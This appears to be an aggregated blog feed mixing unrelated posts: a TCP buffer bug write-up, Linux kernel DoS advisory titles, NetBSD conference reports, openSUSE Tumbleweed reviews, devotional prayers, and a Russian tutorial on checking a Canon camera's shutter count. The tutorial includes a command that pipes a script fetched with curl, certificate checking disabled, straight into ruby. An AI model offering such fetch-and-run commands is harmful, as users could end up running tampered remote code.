when they do… Well, you can see in the image how the data is changed with each iteration of the loop. The end result is that we have corrupted our buffer and mess everything up. The Linux TCP stack had no issue, it was all in our code. The problem is that while it is rare, it is perfectly fine to fragment the data you send into multiple packets, each with very small length. The reason why TCP_NODELAY “fixed” the issue was that it probably didn’t trigger the multiple small buffers one after another in that particular scenario. It is also worth noting that we tracked this down to specific load pattern that would cause the sender to split packets in this way to generate this error condition.

That didn’t actually fix anything, since it could still happen, but I traced the code, and I think that this happened with more regularity since we hit the buffer just right to send a value over the buffer size in just the wrong way. The fix for this, by the way, is to avoid the manual buffer copying and to use memove(), which is safe to use for overlapped ranges.

That leave us with the question, why did it take us so long to find this out? For that matter, how could this error surface only in this particular case? There is nothing really special with the database id, and this particular method is called a lot by the code.

Figuring this out took even more time, basically, this bug was hidden by the way our code validate the incoming stream. We don’t trust data from the network, and we run it through a set of validations to ensure that it is safe to consume. When this error happened in the normal course of things, higher level code would typically detect that as corruption and close the connection. The other side would retry and since this is timing dependent, it will very likely be able to proceed. The issue with database ids is that they are opaque binary values (they are guids, so no structure at all that is meaningful for the application). That means that only when we got this particular issue on that particular field (and other field at all) will we be able to pass validation and actually get the error.

The fix was annoyingly simply given the amount of time we spent finding it, but we have been able to root out a significant bug as a result of the real world tests we run.


          Vuln: Linux kernel CVE-2017-9074 Local Denial of Service Vulnerability   
Linux kernel CVE-2017-9074 Local Denial of Service Vulnerability
          Vuln: Linux kernel CVE-2017-9075 Local Denial of Service Vulnerability   
Linux kernel CVE-2017-9075 Local Denial of Service Vulnerability
          Vuln: Linux Kernel CVE-2017-8890 Denial of Service Vulnerability   
Linux Kernel CVE-2017-8890 Denial of Service Vulnerability
          Vuln: Linux Kernel 'drivers/usb/serial/omninet.c' Local Denial of Service Vulnerability   
Linux Kernel 'drivers/usb/serial/omninet.c' Local Denial of Service Vulnerability
          AsiaBSDCon 2015   

AsiaBSDCon 2015 was held in Tokyo on 12-15 March. It was my first time attending, and with a big NetBSD community in Japan I was very interested to go. Links to most of the talks and slides mentioned below are on the main NetBSD presentations site.

On Friday we had both a closed NetBSD developer session in the morning and an open NetBSD birds of a feather session in the evening. We had developers from Europe, the US and Canada as well as Japan. The BoF session, with around 25 attendees, had a talk by Kazuya Goda, who is not yet a developer but will apply soon, on Development of vxlan(4) using rumpkernel. Vxlan tunnels ethernet frames over UDP and is often used in datacentre multi-tenant applications and for VPN applications. Using the rump kernel made porting from the FreeBSD code extremely easy, with the code being tested in userspace with a tunnel to a FreeBSD box to test interoperability and no changes needed to make it run in kernel.

Taylor Campbell (riastradh@) talked about the staus of DRM/KMS, the direct rendering framework for graphics that is in NetBSD current and will be in 7.0. He had fixed several bugs in the days before the talk, so now is a good time to try out the code on your hardware before 7.0 is out. Porting to non x86 platforms that have compatible cards (radeon) would also be useful at this point.

Makoto Fujiwara (mef@) and Ryo Onodera (ryoon@) talked about pkgsrc, including how to package up software in github, which is now really easy. With the closure of Google Code an whole lot more projects are moving to Github, so it is useful that packaging is so easy.

Jun Ebihara (jun@) gave an overview of the Japan NetBSD users group, which travels all around Japan to a large number of events with a large collection of mainly very small machines which run NetBSD current. These include new machines like the Raspberry Pi and Cubieboard as well as old favourites such as the Zaurus, Jornada and Dreamcast. These were also on display at the conference, and got rather more attention than the very noisy blade server running FreeBSD opposite.

The conference proper, on Friday and Saturday had many NetBSD related talks. A highlight was Dennis Ferguson's (dennis@) keynote on modernising the BSD network stack, based on his experience building commercial BSD based routers; he was a founding engineer at Juniper. We got some history, as well as some detailed recommendations about structuring the network stack structures to match modern protocol hierarchies.

Still on networking, Ryota Ozaki (ozaki@) talked about the work that IIJ, conference sponsors and home to many of the Japanese developers, were doing on supporting MSI interrupts and multi-queue devices, improving performance on multicore systems. Martin Husemann (martin@) talked about running big endian ARM on new hardware, a platform that is not used much and found some bugs.

On Sunday, Taylor talked about doing cross compilation in pkgsrc properly. FreeBSD has taken the aproach of using qemu userspace emulation, but there are problems with this that have to be fudged around, while almost everything can be cross compiled properly with dedication. Perl and Python are an issue, and need volunteers. I (justin@) gave a talk about the rump kernel, and how to make driver development and debugging easier.

There was also lots of excellent food, interesting talks about the rest of the BSD family, and a lot of conversations about many aspects of NetBSD. I highly recommend coming along next year. The call for papers will be earlier, so start planning now.

          EuroBSDCon 2009 - Cambridge, UK   

The 8th EuroBSDCon was held at University of Cambridge in the United Kingdom on 18 - 20 September 2009. This year four NetBSD Developers, Alistair Crooks, Adam Hamsik, Joerg Sonnenberger and Arnaud Ysmal, presented a range of topics including Role Based Access Control, Journaling FFS, NetBSD LVM, The pkgsrc wrapper framework, A BSD licensed PGP library, and fs-utils: File systems access tools in userland.

Role Based Access Control - Alistair Crooks

This talk describes the design, implementation and real-world experience of implementing Role-Based Access Control in the NetBSD kernel. Using the existing kauth(9) facility, root's privileged operations have been split into 57 separate roles, and this talk will explain the different role groupings, the development process, design and implementation decisions, kernel and user level changes necessary, and practical lessons learned.

Slides

Paper

Journalling FFS - Joerg Sonnenberger

The talk reintroduces FFS and the consistency constraints for meta data updates. It introduces the WAPBL changes, both in terms of the on-disk format and the implementation in NetBSD. Finally the implementation is compared with other file systems and specific issues of and plans for the current implementation are discussed.

Slides

NetBSD LVM - Adam Hamsik

This talk introduces LVM as a method of allocating disk space on a disk storage devices. Which is more flexible than conventional ones. Logical Volume Manager can usually stripe, mirror or othervise combine disk partitions to bigger virtual partitions which can be easily moved, resized or manipulated in different ways while in use. Volume Management is one form of disk storage virtualization used in Operating Systems.

The NetBSD LVM has two parts user land tools and a kernel driver. Kernel driver is called device- mapper. User land part is based on Linux lvm tools developed by a community managed by Redhat inc.

The Device-mapper driver can create virtual disk devices according to device table loaded to it. This table specifies which devices are used as a backend, on which offset on particular device virtual device starts. Device-mapper configuration is not persistent and must be loaded to kernel after each reboot by lvm the tools.

Slides

Paper

The pkgsrc wrapper framework - Joerg Sonnenberger

The wrapper framework in pkgsrc serves two central roles: - abstracting compiler specifica - limiting visibility of installed packages in combination with buildlink. It helps making package builds a lot more reproducable and decreases the number of patches for platforms that are not using GCC or ELF. The offered flexibility comes at a price, both in terms of execution speed and code complexity. This talk explains how the wrapper framework interacts with the rest of pkgsrc, analyzes the performance of the existing implementation and introduces a simpler and faster reimplementation.

Slides

Paper

netpgp - BSD-licensed privacy software - Alistair Crooks

This talk introduces the netpgp library, a BSD-licensed PGP library, which is compatible with the GNU Privacy Guard program (GPG or GNUPG). The library itself is described, and the suite of userland programs built around it, such as the signing/verification/encryption and decryption program, a program to manage keys, and a separate standalone verification program. Possible practical uses for the library are also provided, along with a demonstration of some of these uses.

Slides

Paper

fs-utils: File systems access tools in userland - Arnaud Ysmal

This talk introduces the fs-utils set of tools, an application suite which provides mtools-like file system access without requiring mount privileges or an in-kernel driver. fs-utils reuses the kernel file system drivers through the RUMP framework and the UKFS library instead of relying on a userspace reimplementation. It supports a total of 12 file systems from NetBSD plus FUSE file systems, and offers the same usage as the well-known tools (e.g. all of the flags of ls are supported).

Slides

Paper


          NetBSD developer summit in Cambridge/UK   

On Friday, the 18th of September, a group of NetBSD developers from all over the world met during a developer summit at the Fitzwilliam College in Cambridge/UK. It provided a great opportunity for developers to meet each other in person, to share ideas and to talk about ongoing and future projects.
The summit was organised by Stephen Borrill and sponsored by Precedence Technologies, a Cambridge based company selling NetBSD based products.

Based on a presentation by Alistair Crooks the roadmap for NetBSD 6.0 was discussed. Here are some of the highlights that are planned for NetBSD 6.0:

  • System:
    • kernel modules
    • POSIX shared memory
    • processor & cache aware scheduler
  • Networking:
    • Mobile IPv6
    • SCTP
    • netboot from HTTP
  • Storage:
    • LVM
    • ZFS
    • iSCSI initiator
    • devfs
  • Virtualisation:
    • Xen domU migration, suspend & resume
    • Xen ballon driver
    • Gaols via kauth (similar to FreeBSD jails)
    • iSCSI booting
  • Security:
    • RBAC kernel
    • netpgp
    The current plan is to branch NetBSD 6.0 in March 2010 and release it in summer 2010.


          USENIX 2009 - Rump File Systems: Kernel Code Reborn   

At USENIX 2009 I talked about rump file systems. The paper (pdf, html) and slides are available. Additionally, USENIX members can view a video of the presentation.

paper abstract

When kernel functionality is desired in userspace, the common approach is to reimplement it for userspace interfaces. We show that use of existing kernel file systems in userspace programs is possible without modifying the kernel file system code base. Two different operating modes are explored: 1) a transparent mode, in which the file system is mounted in the typical fashion by using the kernel code as a userspace server, and 2) a standalone mode, in which applications can use a kernel file system as a library. The first mode provides isolation from the trusted computing base and a secure way for mounting untrusted file systems on a monolithic kernel. The second mode is useful for file system utilities and applications, such as populating an image or viewing the contents without requiring host operating system kernel support. Additional uses for both modes include debugging, development and testing.

The design and implementation of the Runnable Userspace Meta Program file system (rump fs) framework for NetBSD is presented. Using rump, ten disk-based file systems, a memory file system, a network file system and a userspace framework file system have been tested to be functional. File system performance for an estimated typical workload is found to be ±5% of kernel performance. The prototype of a similar framework for Linux was also implemented and portability was verified: Linux file systems work on NetBSD and NetBSD file systems work on Linux. Finally, the implementation is shown to be maintainable by examining the 1.5 year period it has been a part of NetBSD.


          Как узнать пробег DSLR камеры на примере Canon EOS 7D   
Как узнать пробег DSLR камеры на примере Canon EOS 7D

Мотив просмотра счетчика пробега DSLR камеры Canon — у всех разный, например при покупке б/у фотоаппарата или продаже или просто ради собственного любопытства. На практике оказывается не у всех камер Canon просто его посмотреть. До сих пор не понимаю, почему разработчики упорно прячут эту цифру в своем фирменном софте, но для нас это не проблема.

В этой статье я расскажу и покажу несколько способов узнать пробег DSLR камеры для Mac OS X.

Способ номер 1
Для использования данного способа вам необходима установленная операционная система Windows на виртуальной машине или же через BootCamp, т.к. для данного способа требуется установленный браузер Internet Explorer.

1. Подключаем камеру к USB и включаем
2. Запускаем Internet Explorer и заходим на сайт eoscount.com
3. Устанавливаем плагин для IE с сайта
4. Обновляем сайт и видим картинку:
Как узнать пробег DSLR камеры на примере Canon EOS 7D

Сайт говорит о том, что возможность узнать информацию по количеству отснятых кадров есть. Осталось оплатить 1.69$ чтобы 1 раз узнать эту цифру, либо 5.19$, чтобы мониторить счетчик неограниченное количество раз только для этой камеры!

Данный способ хорош для тех, кто хочет срочно продать камеру или не подготовлен к внезапной покупке.
К недостаткам данного способа можно отнести:
— факт присутствия Windows на макинтоше
— наличие интернета
— возможность онлайн оплаты за услугу

Способ номер 2
Есть бесплатная утилита написанная как для Windows так и Mac OS! называется 40DShutterCount v2 utility

1. Скачиваем и устанавливаем
2. Подключаем камеру к USB и включаем
3. Запускаем программу и жмем на кнопку «Get count»

Как узнать пробег DSLR камеры на примере Canon EOS 7D

И в результате видим (для камеры Canon EOS 7D — ошибку)

Как узнать пробег DSLR камеры на примере Canon EOS 7D

А все потому, что данная программа не поддерживает некоторые камеры и если у вас 7D — увы, данный способ не для вас!

Плюсы:
— софт для Maс OS
— не нужен интернет
— не нужно на компьютере держать виртуальную версию Windows

Минусы:
— ограниченный список DSLR камер, с которых можно получить информацию.

Способ номер 3 — самый четкий
Данным способом я пользовался будучи пользователем Windows, тогда из недостатков отметил для себя содержание виртуальной Linux системы, но так, как Mac OS построена на базе UNIX систем — данный способ самый грамотный и правильный, но для этого нам прийдется немного подготовить наш Mac.

3.1 Первым делом необходимо установить XCode из AppStore или с оф сайта Apple.

После установки XCode, запускаем и заходим в настройки:
Как узнать пробег DSLR камеры на примере Canon EOS 7D


Далее, во вкладку Downloads:
Как узнать пробег DSLR камеры на примере Canon EOS 7D

и напротив строки Command Line Tools нажимаем install. C этим разобрались, идем дальше.

3.2 Теперь необходимо установить менеджер пакетов для OS X — Homebrew.

Запускаем Терминал и вводим строку:
Как узнать пробег DSLR камеры на примере Canon EOS 7D

ruby <(curl -fsSkL raw.github.com/mxcl/homebrew/go)


Как узнать пробег DSLR камеры на примере Canon EOS 7D

Далее нажимаем ENTER

Как узнать пробег DSLR камеры на примере Canon EOS 7D

вводим пароль от своей учетной записи, еще раз ENTER и начинается процесс установки…

Как узнать пробег DSLR камеры на примере Canon EOS 7D

Как узнать пробег DSLR камеры на примере Canon EOS 7D

Готово, Homebrew установлен!

Следить за обновлениями пакетов достаточно просто, вводим команду:
brew update

Как узнать пробег DSLR камеры на примере Canon EOS 7D


3.3 Остался последний шаг — установка gPhoto2

В терминале набираем команду:
brew install gphoto2

Как узнать пробег DSLR камеры на примере Canon EOS 7D

и ждем…

Как узнать пробег DSLR камеры на примере Canon EOS 7D

готово!

Проверяем работу:
В терминале вводим
gphoto2 --list-config

и видим:
Как узнать пробег DSLR камеры на примере Canon EOS 7D

Отлично, осталось подключить камеру!

P.S.
Если вдруг будет ошибка вида:
*** Error ***              
An error occurred in the io-library ('Could not claim the USB device'): Could not claim interface 0 (Permission denied). Make sure no other program or kernel module (such as sdc2xx, stv680, spca50x) is using the device and you have read/write access to the device.
*** Error (-53: 'Could not claim the USB device') ***    


Выполните команду:
killall PTPCamera


и повторите ввод:
gphoto2 --list-config


В результате увидим следующее:
Как узнать пробег DSLR камеры на примере Canon EOS 7D

Все работает, настройка закончена.

Итого
Теперь, при подключении камеры к макинтошку, чтобы узнать количество отснятых кадров камерой, нам необходимо сделать одно движение руки:

1. Подключаем камеру к USB и включаем
2. В терминале вводим команду gphoto2 --list-config
3.Далее вводим команду gphoto2 --get-config /main/status/shuttercounter
и наблюдаем результат:

Как узнать пробег DSLR камеры на примере Canon EOS 7D

Вот и все.

Статью можно добавить в закладки и использовать как подсказку, если что-то забудите.
Успехов!

Постоянный адрес публикации: www.macintoshim.ru
          Stacking the Bricks - The Creative Atom   

The Creative Atom is a kernel you can build on, and grow, and evolve… just as many atoms become a molecule, and many molecules become a bacterium or a chair. click to view

The post The Creative Atom appeared first on bootstrappers.io.


          Carlos Alberto Ferreira Filho: openSUSE Tumbleweed - Revisão da semana 26 de 2017   

Uma nova revisão do que aconteceu na semana 26 de 2017 no openSUSE Tumbleweed a versão “rolling release” de atualização contínua da distribuição de GNU/Linux openSUSE.

O anúncio original você pode ler no blog de Dominique Leuenberger, no link abaixo:

http://dominique.leuenberger.net/blog/2017/06/review-of-the-week-201726/

Esta semana foram liberados 3 instantâneos (0625, 0626 e 0628); Devido a problemas com o OpenQA durante o último fim de semana, os dois snapshots 0623 e 0624 foram descartados (mesmo que tenham sido bons). 0627 foi retido porque nós teríamos enviado um vínculo que não funcionava (depois que a OpenSSL mudou novamente a localização dos motores). Mas, como de costume, é claro, um instantâneo descartado significa que as atualizações chegarão a você um instantâneo mais tarde.

Os três instantâneos trouxeram essas mudanças interessantes:
  •     OpenSSL 1.0.2l
  •     Gdb 8.0
  •     GStreamer 1.12.1
  •     Linux Kernel 4.11.7
  •     LibreOffice 5.4.0.1 (rc1)
  •     Gucharmap 10 - com suporte Uniceode10
Vários usuários têm perguntado durante a última semana sobre o envio do LibreOffice 5.4 beta2. Como com tudo em Tumbleweed, os mantenedores decidem se um pacote / base de código é de qualidade suficiente para ser atualizado. O OpenQA irá cuidar para manter um nível de qualidade como mínimo - mas os testes são tão limitados quanto o que nossos colaboradores descrevem em testes. Se você conhece algo que gostaria de ver testado, basta entrar em contato conosco e encontraremos uma maneira de começar a ajudar a implementar os novos testes.

Outros itens atualmente colocados em fila para agregar ao Tumbleweed:
  •  NetworkManager 1.8
  •  KDE Frameworks 5.35.0
  •  Automake 1.15.1 - se o seu pacote foi inicializado com 1.15.0 e, de forma implícita, eleja automake, isso pode resultar em falhas (chamar automake explicit quando você corrigir fontes)
  •  Linux Kernel 4.11.8
  •  Libzypp: alteração da configuração padrão para 'permitir a mudança de fornecedor para falso' durante o zypper dup (apenas uma alteração no arquivo zypp.conf enviado por padrão)
Estas são itens mais impactantes no momento. O mantenedores nos informaram sobre a lista de discussão sobre algumas modificações impactantes maiores, que estão um pouco mais distantes. Você pode querer avaliar as listas de discussão diretamente.
  • Drop php5 (php7 já esteve em Tumbleweed há muito tempo) 
  •  Use python3 como intérprete de python padrão (como / usr / bin / python)
Com todas essas coisas agradáveis: tenha um ótimo fim de semana, divirta-se muito com o sistema de Tumbleweed atualizado.

https://build.opensuse.org/project/staging_projects/openSUSE:Factory

As ISO’s são instáveis, porém se você já utiliza openSUSE Tumbleweed em seu equipamento, simplesmente deverá atualizá-lo mediante o comando “zypper up” assim seu sistema receberá as atualizações.Para realizar o download acesse o link abaixo:

https://en.opensuse.org/openSUSE:Tumbleweed_installation
 
Mantenha-se atualizado e você sabe: Divirta-se!

          Dominique Leuenberger: Dominique Leuenberger: Review of the week 2017/26   

Dear Tumbleweed users and hackers,

This week I can only offer you 3 snapshots (0625, 0626 and 0628); Due to issues with openQA during the last weekend, the two snapshots 0623 and 0624 were discarded (even though they would have been good). 0627 was held back because we would have shipped a non-working bind in there (after OpenSSL changed the location of the engines again). But as usual, of course, a discarded snapshot just means the updates reach you one snapshot later.

The three snapshots brought you those interesting changes:

  • OpenSSL 1.0.2l
  • gdb 8.0
  • GStreamer 1.12.1
  • Linux Kernel 4.11.7
  • LibreOffice 5.4.0.1 (rc1)
  • gucharmap 10 – with Uniceode10 support

Various users have been asking during the last week about the shipment of LibreOffice 5.4beta2. Like with everything in Tumbleweed, it is up tot he maintainers to decide if a package/code base is of sufficient quality to be updated. openQA will take care to ensure we maintain a certain level of quality as a minimum – but the tests there are as limited as what our contributors write tests for. If you know of anything you’d like to see tested, simply get in touch with us and we’ll find a way to get you started in helping implement the new tests.

Further things currently queued up in Stagings:

  • NetworkManager 1.8
  • KDE Frameworks 5.35.0
  • automake 1.15.1 – if your package was bootstrapped with 1.15.0 and implicitly calls automake, this might give failures (call automake explicit when you patch sources)
  • Linux Kernel 4.11.8
  • libzypp: change of default setting for ‘allow vendor change to false’ during zypper dup (just a change in the default shipped zypp.conf file)

These are the largest impacting things out there at the moment. Maintainers informed us on the mailing list about some larger impacting modifications, that are a bit further away. You might want to weigh in on the mailing lists directly

  • Drop php5 (php7 has been in Tumbleweed for a long time already)
  • Use python3 as default python interpreter (as /usr/bin/python)

 


          Patch On Linux Kernel Stable Branches Breaks rr   

A change in 4.12rc5 breaks rr. We're trying to get it fixed before 4.12 is released, and I think that will be OK. Unfortunately that change has already been backported to 3.18.57, 4.4.72, 4.9.32 and 4.11.5 :-( (all released on June 14, and I guess arriving in distros a bit later). Obviously we'll try to get the 4.12 fix also backported to those branches, but that will take a little while.

The symptoms are that long, complex replays fail with "overshot target ticks=... by " where N is generally a pretty large number (> 1000). If you look in the trace file, the value N will usually be similar to the difference between the target ticks and the previous ticks value for that task --- i.e. we tried to stop after N ticks but we actually stopped after about N*2 ticks. Unfortunately, rr tests don't seem to be affected.

I'm not sure if there's a reasonable workaround we can use in rr, or if there is one, whether it's worth effort to deploy. That may depend on how the conversation with upstream goes.

          John 12:24   
Driving through the beautiful, bucolic farmlands of south central Pennsylvania, I noticed the gloriously golden wheat fields and pondered these words spoken by Jesus.  

I tell you the truth, unless a kernel of wheat falls to the ground and dies, it remains only a single seed. But, if it dies, it produces many seeds.  John 12:24

Glorious Father-
Thank you for this beautiful word picture. Like a grain of wheat that falls to the ground and dies to live anew, I lay down all my dreams and worldly desires to follow you. Plant me wherever you want to produce a harvest for your Kingdom. Press down on me, crush me, and break me. Soften me and release me to press upward to reproduce an enormous multiplication of blessings.

God please crucify me with Jesus - fully yielded, completely surrendered, totally submitted. Use the problems and challenges that are part of my every day life to put me to death. Then raise me, like a kernel of wheat to an abundant ... victorious ... blessed ... fruitful ... powerful ... Christ-like ... Spirit-filled life. I love you Lord and want to be more like you! In Jesus name, I surrender all. Amen.

What do you need to surrender in order to reproduce abundant blessings for the Kingdom of God?

Make a deliberate determination to be interested only in what interests God. Intentionally, remove everything from your life that keeps you from following God's dreams and plans. Concentrate on the Son who did not give up when He had to suffer shame and die on a cross. He knew of the joy that would be His later. This joy will be yours too, if only you will die to yourself and devote your life to Him.

O. Chambers writes (06/19) in My Utmost For His Highest, "The secret of a disciple's life is devotion to Jesus Christ, and the characteristic of that life is its seeming insignificance and its meekness. Yet it is like a grain of wheat that "falls into the ground and dies" - it will spring up and change the entire landscape.

          Psalm 126   
Psalm 126
When the LORD restored his exiles to Jerusalem,
it was like a dream!
We were filled with laughter,
and we sang for joy.
And the other nations said,
"What amazing things the LORD has done for them."
Yes, the LORD has done amazing things for us!
What joy!

Restore our fortunes, LORD,
as streams renew the desert.
Those who plant in tears
will harvest with shouts of joy.
They weep as they go to plant their seed,
but they sing as they return with the harvest. NLT

How Great You are O Sovereign King! There is none like You!

Lord, overwhelming sorrow tries to take me away from You. Battered and bruised by the battle with the enemy, a fountain of tears flow from my eyes. Wounded and worn out, I weep. Gripped by grief, I'm a miserable mess. Rescue me! Restore my fortune! Bring me back to the peace of Your presence.

Help me to plant kernels of love, joy, peace, patience, kindness, goodness, faithfulness, humility and discipline in the soil surrounding my sadness. I will gently water them with a steady stream of tears. And, then I will patiently wait through the season of sorrow for the promised heavenly harvest.

When I joyfully return with baskets full of bountiful blessings I will share a foretaste of glory divine with those around me. They will notice that You have done amazing things for me! Together, we will sing, laugh and celebrate a yield of sweet succulent spiritual fruit. I believe that You will turn my hard situation into an enormous reward for the praise of Your glory! Amen.

What has taken you away from your Sovereign King? It could be sin, addiction, false teaching, idolatry, ministering to someone needy, transition, a new job, busyness, or love to name a few. Identify the thing that holds you captive and break free! Plant the seed of His Word in the soil of your situation, water it with your tears and patiently endure while it grows. Then reap the bountiful blessed harvest and celebrate the amazing things the Lord has done! 

          The Design and Implementation of the Anykernel and Rump Kernels, 2nd Edition   
The definitive technical guide to the core of the Rump Kernel project.
          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Slackware: 2017-181-02: kernel Security Update   
LinuxSecurity.com: New kernel packages are available for Slackware 14.2 and -current to fix security issues.
          The First Alpha of Ubuntu 17.10 Is Available for Opt-in Flavors   
The first alpha of Ubuntu 17.10 Artful Aardvark was released earlier today. It features images for Lubuntu, Kubuntu, and Ubuntu Kylin. The pre-release uses the kernel and graphics stacks of Ubuntu 17.04, which include Linux Kernel 4.10, X.Org Server 1.19.3 display server, and Mesa 17.1.2 3D Graphics Library. The systemd init system, however, was upgraded […]
          PCIe (PCI Express) eSATA / SATA Karte für Macintosh Lion   
Will man seinen Mac (Lion) um eine eSATA oder SATA Controllerkarte erweitern, so gibt es nicht unbedingt eine große Auswahl. Damit das Betriebssystem weiterhin läuft und es zu keiner „Kernel Panic“ kommt, sollte die Hardware gut ausgewählt sein. Anscheinend optimal […]
          Adrian Sutton: Fun with Nvidia Drivers and Fedora Upgrades   

After any major Fedora upgrade my system loses the proprietary nvidia drivers that make X actually work (I’ve never successfully gotten the nouveau drivers to handle my card and multi-monitor setup) so the system reboots and simply presents an “oops, something went wrong” screen.

The issue seems to be that the nvidia driver doesn’t recompile for the new kernel, despite the fact that I’m using akmod packages which should in theory automatically recompile for new kernels.

The tell-tale sign is:

[   161.484] (II) LoadModule: "nv"
[   161.484] (WW) Warning, couldn't open module nv
[   161.484] (II) UnloadModule: "nv"
[   161.484] (II) Unloading nv
[   161.484] (EE) Failed to load module "nv" (module does not exist, 0)

in the Xorg logs.

Some digging reveals that the akmod recompilation process should be triggered by /etc/kernel/postinst.d/akmodsposttrans but for whatever reason that didn’t run.

The key piece of that script was running akmods similar to:

/usr/sbin/akmods --from-kernel-posttrans --kernels 4.8.11-300.fc25.x86_64

The last argument is the current kernel version, which should match the directory name in /lib/modules/ – there will likely be a few options, either run the command for each of them or pick the latest which is likely to be the one missing the nvidia drivers.

Run that script, reboot and everything came back just fine, though there is likely a better way to do it…


             
TechComparison - Linux Virtualization Wiki:  Interesting comparison chart of virtualization technologies.  Also: a story of a satisfied Xen user.

          A Note on Some Approximation Kernels on the Sphere. (arXiv:1706.09456v1 [math.CA])   

Authors: Peter J. Grabner

We produce precise estimates for the Kogbetliantz kernel for the approximation of functions on the sphere. Furthermore, we propose and study a new approximation kernel, which has slightly better properties.


          On the heat content for the poisson kernels over sets of finite perimeter. (arXiv:1706.09477v1 [math.PR])   

Authors: Luis Acuna Valverde

This paper studies the small time behavior of the heat content for the Poisson kernel over a bounded open set $\dom\subset \Rd$, $d\geq 2$, of finite perimeter by working with the set covariance function. As a result, we obtain a third order expansion involving geometric features related to the underlying set $\dom$. We provide the explicit form of the third term for the unit ball when $d=2$ and $d=3$ and supply some results concerning the square $[-1,1]\times [-1,1]$.


          Metric duality between positive definite kernels and boundary processes. (arXiv:1706.09532v1 [math.FA])   

Authors: Palle Jorgensen, Feng Tian

We study representations of positive definite kernels $K$ in a general setting, but with view to applications to harmonic analysis, to metric geometry, and to realizations of certain stochastic processes. Our initial results are stated for the most general given positive definite kernel, but are then subsequently specialized to the above mentioned applications. Given a positive definite kernel $K$ on $S\times S$ where $S$ is a fixed set, we first study families of factorizations of $K$. By a factorization (or representation) we mean a probability space $\left(B,\mu\right)$ and an associated stochastic process indexed by $S$ which has $K$ as its covariance kernel. For each realization we identify a co-isometric transform from $L^{2}\left(\mu\right)$ onto $\mathscr{H}\left(K\right)$, where $\mathscr{H}\left(K\right)$ denotes the reproducing kernel Hilbert space of $K$. In some cases, this entails a certain renormalization of $K$. Our emphasis is on such realizations which are minimal in a sense we make precise. By minimal we mean roughly that $B$ may be realized as a certain $K$-boundary of the given set $S$. We prove existence of minimal realizations in a general setting.


          Quantitative estimate of propagation of chaos for stochastic systems with $W^{-1, \infty}$ kernels. (arXiv:1706.09564v1 [math.AP])   

Authors: Pierre-Emmanuel Jabin, Zhenfu Wang

We derive quantitative estimates proving the propagation of chaos for large stochastic systems of interacting particles. We obtain explicit bounds on the relative entropy between the joint law of the particles and the tensorized law at the limit. We have to develop for this new laws of large numbers at the exponential scale. But our result only requires very weak regularity on the interaction kernel in the negative Sobolev space $\dot W^{-1,\infty}$, thus including the Biot-Savart law and the point vortices dynamics for the 2d incompressible Navier-Stokes.


          Accelerated nonlocal nonsymmetric dispersion for monostable equations on the real line. (arXiv:1706.09647v1 [math.AP])   

Authors: Dmitri Finkelshtein, Pasha Tkachov

We consider the accelerated propagation of solutions to equations with a nonlocal linear dispersion on the real line and monostable nonlinearities (both local or nonlocal), in the case when either of the dispersion kernel or the initial condition has regularly heavy tails at both $\pm\infty$, perhaps different. We show that, in such case, the propagation to the right direction is fully determined by the right tails of either the kernel or the initial condition. We describe both cases of integrable and monotone initial conditions which may give different orders of the acceleration. Our approach is based, in particular, on the extension of the theory of sub-exponential distributions, which we introduced early in arXiv:1704.05829 [math.PR].


          Littlewood-Paley-Stein operators on Damek-Ricci spaces. (arXiv:1706.09743v1 [math.AP])   

Authors: Anestis Fotiadis, Effie Papageorgiou

We obtain pointwise upper bounds on the derivatives of the heat kernel on Damek-Ricci spaces. Applying these estimates we prove the $L^p$-boundedness of Littlewood-Paley-Stein operators.


          An explicit formula for Szego kernels on the Heisenberg group. (arXiv:1706.09762v1 [math.CV])   

Authors: Hendrik Herrmann, Chin-Yu Hsiao, Xiaoshan Li

In this paper, we give an explicit formula for the Szego kernel for $(0, q)$ forms on the Heisenberg group $H_{n+1}$.


          On the Bickel-Rosenblatt test of goodness-of-fit for the residuals of autoregressive processes. (arXiv:1706.09811v1 [math.ST])   

Authors: Agnès Lagnoux, Thi Mong Ngoc Nguyen, Frédéric Proïa

We investigate in this paper a Bickel-Rosenblatt test of goodness-of-fit for the density of the noise in an autoregressive model. Since the seminal work of Bickel and Rosenblatt, it is well-known that the integrated squared error of the Parzen-Rosenblatt density estimator, once correctly renormalized, is asymptotically Gaussian for independent and identically distributed (i.i.d.) sequences. We show that the result still holds when the statistic is built from the residuals of general stable and explosive autoregressive processes. In the univariate unstable case, we also prove that the result holds when the unit root is located at $-1$ whereas we give further results when the unit root is located at $1$. In particular, we establish that except for some particular asymmetric kernels leading to a non-Gaussian limiting distribution and a slower convergence, the statistic has the same order of magnitude. Finally we build a goodness-of-fit Bickel-Rosenblatt test for the true density of the noise together with its empirical properties on the basis of a simulation study.


          On the Cartier Duality of Certain Finite Group Schemes of order $p^n$, II. (arXiv:1210.3980v8 [math.AG] UPDATED)   

Authors: Michio Amano

We explicitly describe the Cartier dual of the $l$-th Frobenius kernel $N_l$ of the deformation group scheme, which deforms the additive group scheme to the multiplicative group scheme. Then the Cartier dual of $N_l$ is given by a certain Frobenius type kernel of the Witt scheme. Here we assume that the base ring $A$ is a $Z_{(p)}/(p^n)$-algebra, where $p$ is a prime number. The obtained result generalizes a previous result by the author which assumes that $A$ is a ring of characteristic $p$.


          A Polyakov formula for sectors. (arXiv:1411.7894v4 [math.SP] UPDATED)   

Authors: Clara L. Aldana, Julie Rowlett

We consider finite area convex Euclidean circular sectors. We prove a variational Polyakov formula which shows how the zeta-regularized determinant of the Laplacian varies with respect to the opening angle. Varying the angle corresponds to a conformal deformation in the direction of a conformal factor with a logarithmic singularity at the origin. We compute explicitly all the contributions to this formula coming from the different parts of the sector. In the process, we obtain an explicit expression for the heat kernel on an infinite area sector using Carslaw-Sommerfeld's heat kernel. We also compute the zeta-regularized determinant of rectangular domains of unit area and prove that it is uniquely maximized by the square.


          Backup des des applications données Android pour un transfert vers un autre appareil.   

Tout fraîchement équipé du tout nouveau Galaxy S4  je cherchais un moyen de récupérer les données des applications. Attention, ADB ne peut sauvegarder que depuis ICS (Ice Cream Sandwitch).

On peut bien entendu utiliser un tas d'applications du market pour faire un backup restore des SMS, appli ... mais aucune d'entre elle ne peut sauvegarder les données de l'application et du coup on perd forcement les scores, bonus et autres configurations ...

Après avoir essayé quelques applications sans succès et pi ne voulant pas forcement passer par une solution software j'ai voulu essayer avec ADB, l'utilitaire présent dans le Software Développement Kit nommé SDK, d'Android.

